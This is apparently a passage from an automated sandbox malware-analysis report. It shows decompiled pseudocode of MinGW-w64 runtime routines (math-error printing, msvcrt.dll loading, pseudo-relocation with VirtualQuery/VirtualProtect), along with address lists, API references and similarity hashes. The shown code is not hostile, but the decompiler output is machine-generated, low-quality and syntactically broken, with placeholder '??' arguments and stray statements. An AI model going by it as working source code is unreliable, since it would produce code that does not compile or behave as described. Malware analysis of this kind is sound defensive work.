          control_flow_graph 347 402202-402209 __iob_func fprintf
          APIs
          Strings
          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 004021B5
          • Partial loss of significance (PLOSS), xrefs: 00402202
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: __iob_funcfprintf
          • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
          • API String ID: 620453056-4283191376
          • Opcode ID: 0ba884e6ec1d4451d0b14812ced9295676d6f7eeb1160479ba6f5f4925bf4c7a
          • Instruction ID: 80c076e3f0585dc642847406495aacac54e743d69e61995310db27f34450b86f
          • Opcode Fuzzy Hash: 0ba884e6ec1d4451d0b14812ced9295676d6f7eeb1160479ba6f5f4925bf4c7a
          • Instruction Fuzzy Hash: 32E039B3214B4095D6119F06E8403983364F348BE9FA80126EF8C177A4CF39C683C708
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 349 402210-402217 __iob_func fprintf
          APIs
          Strings
          • Argument domain error (DOMAIN), xrefs: 00402210
          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 004021B5
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: __iob_funcfprintf
          • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
          • API String ID: 620453056-2713391170
          • Opcode ID: c44963c47ca9f90aacc2e6ce41b113bdc135d57d9ec7966c7acc202850251e17
          • Instruction ID: fd2bd81a5517a7f696e63bb9baeac2a55bd67766aab559b42eb37b527b43f7e7
          • Opcode Fuzzy Hash: c44963c47ca9f90aacc2e6ce41b113bdc135d57d9ec7966c7acc202850251e17
          • Instruction Fuzzy Hash: 52E039B3214B4495D6109F06E8403983364F348BE9FA80126EF8C177A4DF39C683C708
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 004021B5
          • Argument singularity (SIGN), xrefs: 00402220
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: __iob_funcfprintf
          • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
          • API String ID: 620453056-2468659920
          • Opcode ID: 02deb9d2806da54c03c492bb07d233467691d5c4467b1243c7e621cec4b7b8b5
          • Instruction ID: d01de4ac6177404e7b6db5e19fe0364507a8127954eade7022529d24d2f77981
          • Opcode Fuzzy Hash: 02deb9d2806da54c03c492bb07d233467691d5c4467b1243c7e621cec4b7b8b5
          • Instruction Fuzzy Hash: A5E039B3214B4095D6109F06E8403983364F348BE9FA80126DF8C577A5CF39C687C708
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          • Overflow range error (OVERFLOW), xrefs: 00402230
          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 004021B5
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: __iob_funcfprintf
          • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
          • API String ID: 620453056-4064033741
          • Opcode ID: 73a878ddbbe0b047fe4021053390a7dcb22e9d4371b01f7b0f137aaed45d7621
          • Instruction ID: 37e83fe092d742cbcaad9b17cd01710a6ccc3a0e2857bf025fb84eeff51f151a
          • Opcode Fuzzy Hash: 73a878ddbbe0b047fe4021053390a7dcb22e9d4371b01f7b0f137aaed45d7621
          • Instruction Fuzzy Hash: 85E039B3214B4095D6109F06E8403983364F348BE9FA80126EF8C177A4CF39C683C708
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E00402B60(struct HINSTANCE__* __eax, void* __rcx) {
          				struct HINSTANCE__* _t7;
          				struct HINSTANCE__* _t9;
          				signed char* _t10;
          				signed char* _t11;
          				signed int _t12;
          				signed int _t13;
          				signed int _t14;
          				signed int _t15;
          				signed int _t16;
          				signed int _t17;
          				signed char* _t20;
          				void* _t21;
          				void* _t24;
          				void* _t25;
          
          				_t21 = __rcx;
          				_t7 = __eax;
          				_t20 =  *0x44a370;
          				if(_t20 == 0) {
          					_t11 = 0;
          					__eflags = 0;
          					while(1) {
          						_t1 = _t21 + 1; // 0x2
          						_t10 = _t1;
          						E00402AD0(_t11, __eflags, _t24, _t25);
          						__eflags = _t20;
          						if(_t20 == 0) {
          							break;
          						}
          						_t12 =  *_t20 & 0x000000ff;
          						__eflags = _t12 - 0x4d;
          						if(_t12 != 0x4d) {
          							__eflags = _t12 - 0x6d;
          							if(__eflags != 0) {
          								L18:
          								_t11 = _t10;
          								continue;
          							}
          						}
          						_t13 = _t20[1] & 0x000000ff;
          						__eflags = _t13 - 0x53;
          						if(_t13 != 0x53) {
          							__eflags = _t13 - 0x73;
          							if(__eflags != 0) {
          								goto L18;
          							}
          						}
          						_t14 = _t20[2] & 0x000000ff;
          						__eflags = _t14 - 0x56;
          						if(_t14 != 0x56) {
          							__eflags = _t14 - 0x76;
          							if(__eflags != 0) {
          								goto L18;
          							}
          						}
          						_t15 = _t20[3] & 0x000000ff;
          						__eflags = _t15 - 0x43;
          						if(_t15 != 0x43) {
          							__eflags = _t15 - 0x63;
          							if(__eflags != 0) {
          								goto L18;
          							}
          						}
          						_t16 = _t20[4] & 0x000000ff;
          						__eflags = _t16 - 0x52;
          						if(_t16 != 0x52) {
          							__eflags = _t16 - 0x72;
          							if(__eflags != 0) {
          								goto L18;
          							}
          						}
          						_t17 = _t20[5] & 0x000000ff;
          						__eflags = _t17 - 0x54;
          						if(_t17 != 0x54) {
          							__eflags = _t17 - 0x74;
          							if(_t17 != 0x74) {
          								__eflags = _t17 - 0x30 - 9;
          								if(__eflags > 0) {
          									goto L18;
          								}
          							}
          						}
          						_t7 = GetModuleHandleA();
          						__eflags = _t20;
          						 *0x44a370 = _t20;
          						if(_t20 == 0) {
          							break;
          						}
          						goto L1;
          					}
          					_t9 = LoadLibraryW();
          					 *0x44a370 = _t20;
          					return _t9;
          				}
          				L1:
          				return _t7;
          			}

















          0x00402b60
          0x00402b60
          0x00402b65
          0x00402b6f
          0x00402b80
          0x00402b80
          0x00402b82
          0x00402b82
          0x00402b82
          0x00402b85
          0x00402b8a
          0x00402b8d
          0x00000000
          0x00000000
          0x00402b93
          0x00402b96
          0x00402b99
          0x00402b9b
          0x00402b9e
          0x00402bf0
          0x00402bf0
          0x00000000
          0x00402bf0
          0x00402b9e
          0x00402ba0
          0x00402ba4
          0x00402ba7
          0x00402ba9
          0x00402bac
          0x00000000
          0x00000000
          0x00402bac
          0x00402bae
          0x00402bb2
          0x00402bb5
          0x00402bb7
          0x00402bba
          0x00000000
          0x00000000
          0x00402bba
          0x00402bbc
          0x00402bc0
          0x00402bc3
          0x00402bc5
          0x00402bc8
          0x00000000
          0x00000000
          0x00402bc8
          0x00402bca
          0x00402bce
          0x00402bd1
          0x00402bd3
          0x00402bd6
          0x00000000
          0x00000000
          0x00402bd6
          0x00402bd8
          0x00402bdc
          0x00402bdf
          0x00402be1
          0x00402be4
          0x00402be9
          0x00402bec
          0x00000000
          0x00000000
          0x00402bec
          0x00402be4
          0x00402bf7
          0x00402bfd
          0x00402c00
          0x00402c07
          0x00000000
          0x00000000
          0x00000000
          0x00402c07
          0x00402c17
          0x00402c1d
          0x00000000
          0x00402c1d
          0x00402b76
          0x00402b76

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: HandleLibraryLoadModule
          • String ID: msvcrt.dll
          • API String ID: 4133054770-370904613
          • Opcode ID: 0d02aed1ec9913c824d623205299ce68f455a40440a3a782726cd63094a18dd8
          • Instruction ID: 8b2694992b2920be825b1922059b7f305df937d85553eea56994966b37faab82
          • Opcode Fuzzy Hash: 0d02aed1ec9913c824d623205299ce68f455a40440a3a782726cd63094a18dd8
          • Instruction Fuzzy Hash: 6D11B25150959848EF241F25C6AE3773BB76741701F8CC437CA49223E3DBBEAA88E61D
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 34%
          			E00402270(intOrPtr __eax, void* __rbx, intOrPtr __rcx, long long __rdx, void* __rdi, void* __rsi, long long __r8, long long __r9, long long __r12, signed long long __r13, long long _a8, long long _a16, long long _a24, long long _a32) {
          				long long _v32;
          				void* _v40;
          				int _v44;
          				signed long long _v56;
          				void* _v80;
          				char _v104;
          				signed int _v132;
          				intOrPtr _v156;
          				intOrPtr _v168;
          				char _v192;
          				intOrPtr _v204;
          				void* _v216;
          				char _v240;
          				char _v376;
          				intOrPtr _t80;
          				void* _t81;
          				long _t82;
          				long _t83;
          				int _t84;
          				long _t88;
          				intOrPtr _t94;
          				intOrPtr _t95;
          				int _t100;
          				signed int _t104;
          				signed int _t118;
          				void* _t119;
          				void* _t121;
          				long long _t123;
          				signed int* _t132;
          				signed long long _t138;
          				signed int _t139;
          				void* _t141;
          				signed long long _t147;
          				signed char* _t151;
          				intOrPtr* _t154;
          				intOrPtr _t165;
          				intOrPtr _t174;
          				intOrPtr _t176;
          				intOrPtr _t184;
          				intOrPtr _t185;
          				long long _t191;
          				intOrPtr _t211;
          				signed int _t223;
          				long long _t228;
          
          				_t234 = __r13;
          				_t228 = __r12;
          				_t80 = __eax;
          				_push(__rsi);
          				_push(__rbx);
          				_t123 =  &_a16;
          				_a16 = __rdx;
          				_a24 = __r8;
          				_a32 = __r9;
          				_v32 = _t123;
          				L004031D8();
          				_t6 = _t123 + 0x60; // 0x60
          				_t223 = _t6;
          				r8d = 0x1b;
          				L004031E8();
          				_t184 = _v32;
          				L004031D8();
          				_t8 = _t123 + 0x60; // 0x60
          				_t147 = _t8;
          				_t165 = __rcx;
          				_t211 = _t184;
          				L004031F0();
          				L004031F8();
          				asm("o16 nop [cs:eax+eax]");
          				_push(__r13);
          				_push(__r12);
          				_push(_t191);
          				_push(__rdi);
          				_push(_t184);
          				_push(__rcx);
          				_t138 = _t147;
          				_t176 = __rcx;
          				_t185 = _t211;
          				if(_t211 != 0) {
          					_t104 =  *0x44a360;
          					__eflags = _t104;
          					if(__eflags <= 0) {
          						goto L8;
          					} else {
          						_t124 =  *0x44a358;
          						_t121 = 0;
          						asm("o16 nop [eax+eax]");
          						do {
          							_t165 =  *((intOrPtr*)(_t124 + 8));
          							__eflags = _t138 - _t165;
          							if(_t138 < _t165) {
          								goto L7;
          							} else {
          								_t211 =  *((intOrPtr*)(_t124 + 0x10));
          								r8d =  *(_t211 + 8);
          								_t165 = _t165 + _t211;
          								__eflags = _t138 - _t165;
          								if(_t138 < _t165) {
          									L18:
          									_t191 = VirtualQuery;
          									L12:
          									r8d = 0x30;
          									_t166 =  &_v240;
          									_t83 = VirtualQuery(??, ??, ??);
          									__eflags = _t124;
          									if(_t124 == 0) {
          										L26:
          										_t151 = "  VirtualQuery failed for %d bytes at address %p";
          										_t213 = _t138;
          										_t84 = E00402270(_t83, _t138, _t151, _t166, _t176, _t185, _t213, _t223, _t228, _t234);
          										_push(_t191);
          										_push(_t228);
          										_push(_t176);
          										_push(_t185);
          										_push(_t138);
          										r12d =  *0x44a350;
          										__eflags = r12d;
          										if(__eflags == 0) {
          											 *0x44a350 = 1;
          											E004029A0(__eflags);
          											_t84 = E00403100(_t124);
          											_t139 = 0x447310;
          											 *0x44a360 = 0;
          											 *0x44a358 =  &_v376;
          											__eflags = 0x447310 - 7;
          											if(0x447310 <= 7) {
          												goto L28;
          											} else {
          												__eflags = 0 - 0xb;
          												if(0 <= 0xb) {
          													L44:
          													r9d =  *_t139;
          													__eflags = r9d;
          													if(r9d != 0) {
          														goto L33;
          													} else {
          														r8d =  *(_t139 + 4);
          														__eflags = r8d;
          														if(r8d != 0) {
          															goto L33;
          														} else {
          															goto L46;
          														}
          													}
          												} else {
          													_t118 =  *0x447310; // 0x0
          													__eflags = _t118;
          													if(_t118 != 0) {
          														L33:
          														__eflags = _t139 - 0x447310;
          														if(_t139 >= 0x447310) {
          															goto L28;
          														} else {
          															do {
          																r8d = 4;
          																_t151 =  &(_t151[0x400000]);
          																_t84 =  *_t151 +  *_t139;
          																_t139 = _t139 + 8;
          																_v44 = _t84;
          																L1();
          																__eflags = _t139 - 0x447310;
          															} while (_t139 < 0x447310);
          															goto L36;
          														}
          													} else {
          														r11d =  *0x447314; // 0x0
          														__eflags = r11d;
          														if(r11d == 0) {
          															r10d =  *0x447318; // 0x0
          															__eflags = r10d;
          															if(r10d != 0) {
          																L46:
          																__eflags =  *(_t139 + 8) - 1;
          																if( *(_t139 + 8) != 1) {
          																	L75:
          																	_t154 = "  Unknown pseudo relocation protocol version %d.\n";
          																	E00402270(_t84, _t139, _t154, _t166, _t176, 0x447310, _t213, _t223, _t228, _t234);
          																	0;
          																	0;
          																	__eflags =  *_t154 - 0x5a4d;
          																	if( *_t154 != 0x5a4d) {
          																		L77:
          																		asm("repe ret");
          																	}
          																	_t154 = _t154 +  *((intOrPtr*)(_t154 + 0x3c));
          																	__eflags =  *_t154 - 0x4550;
          																	if( *_t154 != 0x4550) {
          																		goto L77;
          																	}
          																	__eflags =  *((short*)(_t154 + 0x18)) - 0x20b;
          																	_t79 =  *((short*)(_t154 + 0x18)) == 0x20b;
          																	__eflags = _t79;
          																	return 0 | _t79;
          																} else {
          																	_t141 = _t139 + 0xc;
          																	__eflags = _t141 - 0x447310;
          																	if(_t141 < 0x447310) {
          																		do {
          																			r8d =  *(_t141 + 8);
          																			_t84 = r8b & 0xffffffff;
          																			_t166 = _t166 + 0x400000;
          																			_t151 =  &(_t151[0x400000]);
          																			__eflags = _t84 - 0x10;
          																			_t223 =  *_t166;
          																			if(__eflags == 0) {
          																				r8d =  *_t151 & 0x0000ffff;
          																				__eflags = r8d & 0x00008000;
          																				if((r8d & 0x00008000) == 0) {
          																					goto L62;
          																				} else {
          																					_t213 = (_t213 | 0xffff0000) - _t166 + _t223;
          																					__eflags = _t213;
          																					_v56 = _t213;
          																					goto L61;
          																				}
          																			} else {
          																				if(__eflags > 0) {
          																					L53:
          																					__eflags = _t84 - 0x20;
          																					if(_t84 == 0x20) {
          																						r8d =  *_t151;
          																						__eflags = r8d & 0x80000000;
          																						if((r8d & 0x80000000) == 0) {
          																							goto L62;
          																						} else {
          																							_t213 = (_t213 | 0x00000000) - _t166 + _t223;
          																							__eflags = _t213;
          																							_v56 = _t213;
          																							goto L68;
          																						}
          																					} else {
          																						__eflags = _t84 - 0x40;
          																						if(_t84 != 0x40) {
          																							goto L52;
          																						} else {
          																							_t223 = _t223 - _t166 +  *_t151;
          																							__eflags = _t223;
          																							_v56 = _t223;
          																							goto L56;
          																						}
          																					}
          																				} else {
          																					__eflags = _t84 - 8;
          																					if(_t84 == 8) {
          																						r8d =  *_t151 & 0x000000ff;
          																						__eflags = r8b & 0x00000080;
          																						if((r8b & 0x00000080) == 0) {
          																							L62:
          																							_t213 = _t213 - _t166;
          																							_t223 = _t223 + _t213;
          																							__eflags = _t84 - 0x10;
          																							_v56 = _t223;
          																							if(__eflags == 0) {
          																								L61:
          																								_t166 =  &_v56;
          																								r8d = 2;
          																								L1();
          																							} else {
          																								if(__eflags > 0) {
          																									__eflags = _t84 - 0x20;
          																									if(_t84 == 0x20) {
          																										L68:
          																										_t166 =  &_v56;
          																										r8d = 4;
          																										L1();
          																									} else {
          																										__eflags = _t84 - 0x40;
          																										if(_t84 == 0x40) {
          																											L56:
          																											_t166 =  &_v56;
          																											r8d = 8;
          																											L1();
          																										}
          																									}
          																								} else {
          																									__eflags = _t84 - 8;
          																									if(_t84 == 8) {
          																										goto L65;
          																									}
          																								}
          																							}
          																						} else {
          																							_t213 = (_t213 | 0xffffff00) - _t166 + _t223;
          																							_v56 = _t213;
          																							L65:
          																							_t166 =  &_v56;
          																							r8d = 1;
          																							L1();
          																						}
          																					} else {
          																						L52:
          																						_t151 = "  Unknown pseudo relocation bit size %d.\n";
          																						_v56 = 0;
          																						_t84 = E00402270(_t84, _t141, _t151, _t166, 0x400000, 0x447310, _t213, _t223, 0, _t234);
          																						goto L53;
          																					}
          																				}
          																			}
          																			_t141 = _t141 + 0xc;
          																			__eflags = _t141 - 0x447310;
          																		} while (_t141 < 0x447310);
          																		L36:
          																		__eflags =  *0x44a360;
          																		if( *0x44a360 > 0) {
          																			_t119 = 0;
          																			_t228 = VirtualQuery;
          																			_t176 = VirtualProtect;
          																			do {
          																				_t132 = _t139 +  *0x44a358;
          																				__eflags =  *_t132;
          																				if( *_t132 == 0) {
          																					goto L38;
          																				} else {
          																					r8d = 0x30;
          																					_t166 =  &_v104;
          																					_t88 = VirtualQuery(??, ??, ??);
          																					__eflags = _t132;
          																					if(_t132 == 0) {
          																						_t139 = _t139 +  *0x44a358;
          																						__eflags = _t139;
          																						_t213 =  *(_t139 + 8);
          																						_t84 = E00402270(_t88, _t139, "  VirtualQuery failed for %d bytes at address %p",  &_v104, _t176, 0x447310,  *(_t139 + 8), _t223, _t228, _t234);
          																						goto L75;
          																					} else {
          																						_t223 =  &_v44;
          																						r8d =  *( *0x44a358 + _t139);
          																						_t84 = VirtualProtect(??, ??, ??, ??);
          																						goto L38;
          																					}
          																				}
          																				goto L81;
          																				L38:
          																				_t119 = _t119 + 1;
          																				_t139 = _t139 + 0x18;
          																				__eflags = _t119 -  *0x44a360;
          																			} while (_t119 <  *0x44a360);
          																		}
          																	}
          																	goto L28;
          																}
          															} else {
          																_t139 = 0x44731c;
          																goto L44;
          															}
          														} else {
          															goto L33;
          														}
          													}
          												}
          											}
          										} else {
          											L28:
          											return _t84;
          										}
          									} else {
          										_t95 = _v204;
          										__eflags = _t95 - 4;
          										if(_t95 == 4) {
          											L14:
          											return memcpy();
          										}
          										__eflags = _t95 - 0x40;
          										if(_t95 == 0x40) {
          											goto L14;
          										}
          										r8d = 0x40;
          										VirtualProtect(??, ??, ??, ??);
          										memcpy(??, ??, ??);
          										_t80 = _v204;
          										__eflags = _t80 - 0x40;
          										if(_t80 == 0x40) {
          											goto L2;
          										} else {
          											__eflags = _t80 - 4;
          											if(_t80 == 4) {
          												goto L2;
          											} else {
          												r8d = _v132;
          												return VirtualProtect(??, ??, ??, ??);
          											}
          										}
          									}
          								} else {
          									goto L7;
          								}
          							}
          							goto L81;
          							L7:
          							_t121 = _t121 + 1;
          							_t124 = _t124 + 0x18;
          							__eflags = _t121 - _t104;
          						} while (__eflags != 0);
          						L8:
          						_t81 = E00402960(__eflags, _t138, _t176, _t185, _t211, _t223);
          						__eflags = _t123;
          						_t228 = _t123;
          						if(__eflags == 0) {
          							_t166 = _t138;
          							_t82 = E00402270(_t81, _t138, "Address %p has no image-section", _t166, _t176, _t185, _t211, _t223, _t228, _t234);
          							goto L25;
          						} else {
          							_t234 = 0 << 3;
          							_a16 = _t123;
          							 *((0 << 3) +  *0x44a358) = 0;
          							E00402A50(__eflags, _t165);
          							r8d = 0x30;
          							_t166 =  &_v192;
          							_a8 = _t123 + _t165;
          							_t124 =  *0x44a358;
          							_t191 = VirtualQuery;
          							_t82 = VirtualQuery(??, ??, ??);
          							__eflags = _t124;
          							if(_t124 == 0) {
          								L25:
          								_t124 =  *0x44a358;
          								_t83 = E00402270(_t82, _t138, "  VirtualQuery failed for %d bytes at address %p", _t166, _t176, _t185,  *((intOrPtr*)( *0x44a358 + _t234 + 8)), _t223, _t228, _t234);
          								goto L26;
          							} else {
          								_t94 = _v156;
          								__eflags = _t94 - 4;
          								if(_t94 != 4) {
          									__eflags = _t94 - 0x40;
          									if(_t94 == 0x40) {
          										goto L11;
          									} else {
          										r8d = 0x40;
          										_t174 = _v168;
          										_t223 =  *0x44a358 + (0 << 3);
          										_t100 = VirtualProtect(??, ??, ??, ??);
          										__eflags = _t100;
          										if(_t100 != 0) {
          											goto L11;
          										} else {
          											E00402270(GetLastError(), _t138, "  VirtualProtect failed with code 0x%x", _t174, _t176, _t185, _t211, _t223, _t228, 0 << 3);
          											goto L18;
          										}
          									}
          								} else {
          									L11:
          									 *0x44a360 =  *0x44a360 + 1;
          									__eflags =  *0x44a360;
          								}
          								goto L12;
          							}
          						}
          					}
          				} else {
          					L2:
          					return _t80;
          				}
          				L81:
          			}















































          0x00402270
          0x00402270
          0x00402270
          0x00402270
          0x00402271
          0x00402276
          0x0040227e
          0x00402283
          0x00402288
          0x0040228d
          0x00402292
          0x0040229e
          0x0040229e
          0x004022a2
          0x004022ad
          0x004022b2
          0x004022b7
          0x004022bc
          0x004022bc
          0x004022c0
          0x004022c3
          0x004022c6
          0x004022cb
          0x004022d1
          0x004022e0
          0x004022e2
          0x004022e4
          0x004022e5
          0x004022e6
          0x004022e7
          0x004022f2
          0x004022f5
          0x004022f8
          0x004022fb
          0x00402310
          0x00402316
          0x00402318
          0x00000000
          0x0040231e
          0x0040231e
          0x00402325
          0x00402327
          0x00402330
          0x00402330
          0x00402334
          0x00402337
          0x00000000
          0x00402339
          0x00402339
          0x0040233d
          0x00402341
          0x00402344
          0x00402347
          0x00402460
          0x00402460
          0x004023d7
          0x004023d7
          0x004023dd
          0x004023e5
          0x004023e7
          0x004023ea
          0x0040251a
          0x0040251a
          0x00402521
          0x00402529
          0x00402530
          0x00402534
          0x00402536
          0x00402537
          0x00402538
          0x0040253d
          0x00402544
          0x00402547
          0x00402554
          0x0040255e
          0x00402575
          0x00402581
          0x00402588
          0x0040259a
          0x004025a7
          0x004025ab
          0x00000000
          0x004025ad
          0x004025ad
          0x004025b1
          0x004026a0
          0x004026a0
          0x004026a3
          0x004026a6
          0x00000000
          0x004026ac
          0x004026ac
          0x004026b0
          0x004026b3
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x004026b3
          0x004025b7
          0x004025b7
          0x004025bd
          0x004025bf
          0x004025d1
          0x004025d1
          0x004025d4
          0x00000000
          0x004025da
          0x004025e1
          0x004025e8
          0x004025ee
          0x004025f3
          0x004025f5
          0x004025f9
          0x004025fc
          0x00402601
          0x00402601
          0x00000000
          0x004025e1
          0x004025c1
          0x004025c1
          0x004025c8
          0x004025cb
          0x00402688
          0x0040268f
          0x00402692
          0x004026b9
          0x004026bc
          0x004026bf
          0x00402827
          0x00402827
          0x0040282e
          0x00402839
          0x0040283d
          0x00402842
          0x00402847
          0x00402849
          0x00402849
          0x00402849
          0x00402854
          0x00402857
          0x0040285d
          0x00000000
          0x00000000
          0x00402861
          0x00402867
          0x00402867
          0x0040286a
          0x004026c5
          0x004026c5
          0x004026c9
          0x004026cc
          0x004026e3
          0x004026e8
          0x004026ec
          0x004026f0
          0x004026f3
          0x004026f6
          0x004026f9
          0x004026fc
          0x00402756
          0x0040275a
          0x00402761
          0x00000000
          0x00402763
          0x0040276d
          0x0040276d
          0x00402770
          0x00000000
          0x00402770
          0x004026fe
          0x004026fe
          0x00402721
          0x00402721
          0x00402724
          0x004027ac
          0x004027af
          0x004027b6
          0x00000000
          0x004027b8
          0x004027be
          0x004027be
          0x004027c1
          0x00000000
          0x004027c1
          0x0040272a
          0x0040272a
          0x0040272d
          0x00000000
          0x0040272f
          0x00402732
          0x00402732
          0x00402735
          0x00000000
          0x00402735
          0x0040272d
          0x00402700
          0x00402700
          0x00402703
          0x004027d9
          0x004027dd
          0x004027e1
          0x00402785
          0x00402785
          0x00402788
          0x0040278b
          0x0040278e
          0x00402792
          0x00402774
          0x00402774
          0x00402778
          0x0040277e
          0x00402794
          0x00402794
          0x004027f6
          0x004027f9
          0x004027c5
          0x004027c5
          0x004027c9
          0x004027cf
          0x004027fb
          0x004027fb
          0x004027fe
          0x00402739
          0x00402739
          0x0040273d
          0x00402743
          0x00402743
          0x004027fe
          0x00402796
          0x00402796
          0x00402799
          0x00000000
          0x00000000
          0x00402799
          0x00402794
          0x004027e3
          0x004027ed
          0x004027f0
          0x0040279b
          0x0040279b
          0x0040279f
          0x004027a5
          0x004027a5
          0x00402709
          0x00402709
          0x00402709
          0x00402714
          0x0040271c
          0x00000000
          0x0040271c
          0x00402703
          0x004026fe
          0x00402748
          0x0040274c
          0x0040274c
          0x00402606
          0x0040260c
          0x0040260e
          0x00402616
          0x00402618
          0x0040261f
          0x00402643
          0x00402646
          0x0040264f
          0x00402651
          0x00000000
          0x00402653
          0x00402657
          0x0040265d
          0x00402661
          0x00402664
          0x00402667
          0x00402809
          0x00402809
          0x0040281b
          0x00402822
          0x00000000
          0x0040266d
          0x00402674
          0x00402680
          0x00402684
          0x00000000
          0x00402684
          0x00402667
          0x00000000
          0x00402630
          0x00402630
          0x00402633
          0x00402637
          0x00402637
          0x00402643
          0x0040260e
          0x00000000
          0x004026cc
          0x00402694
          0x00402694
          0x00000000
          0x00402694
          0x00000000
          0x00000000
          0x00000000
          0x004025cb
          0x004025bf
          0x004025b1
          0x00402549
          0x00402549
          0x00402553
          0x00402553
          0x004023f0
          0x004023f0
          0x004023f4
          0x004023f7
          0x004023f9
          0x00403158
          0x00403158
          0x00402470
          0x00402473
          0x00000000
          0x00000000
          0x0040247d
          0x00402494
          0x0040249f
          0x004024a4
          0x004024a8
          0x004024ab
          0x00000000
          0x004024b1
          0x004024b1
          0x004024b4
          0x00000000
          0x004024ba
          0x004024ba
          0x004024e6
          0x004024e6
          0x004024b4
          0x004024ab
          0x00000000
          0x00000000
          0x00000000
          0x00402347
          0x00000000
          0x0040234d
          0x0040234d
          0x00402350
          0x00402354
          0x00402354
          0x00402358
          0x0040235b
          0x00402360
          0x00402363
          0x00402366
          0x004024f5
          0x004024f8
          0x00000000
          0x0040236c
          0x00402374
          0x00402382
          0x00402386
          0x0040238d
          0x00402397
          0x004023a0
          0x004023a5
          0x004023a9
          0x004023b0
          0x004023bc
          0x004023be
          0x004023c1
          0x004024fd
          0x004024fd
          0x00402515
          0x00000000
          0x004023c7
          0x004023c7
          0x004023cb
          0x004023ce
          0x00402420
          0x00402423
          0x00000000
          0x00402425
          0x0040242c
          0x00402432
          0x0040243c
          0x0040243f
          0x00402445
          0x00402447
          0x00000000
          0x00402449
          0x00402458
          0x00000000
          0x00402458
          0x00402447
          0x004023d0
          0x004023d0
          0x004023d0
          0x004023d0
          0x004023d0
          0x00000000
          0x004023ce
          0x004023c1
          0x00402366
          0x004022fd
          0x004022fd
          0x0040230c
          0x0040230c
          0x00000000

          APIs
          • __iob_func.MSVCRT ref: 004022B7
          • VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004023BC
          • VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004023E5
          Strings
          • Mingw-w64 runtime failure:, xrefs: 00402297
          • Address %p has no image-section, xrefs: 004022E7
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
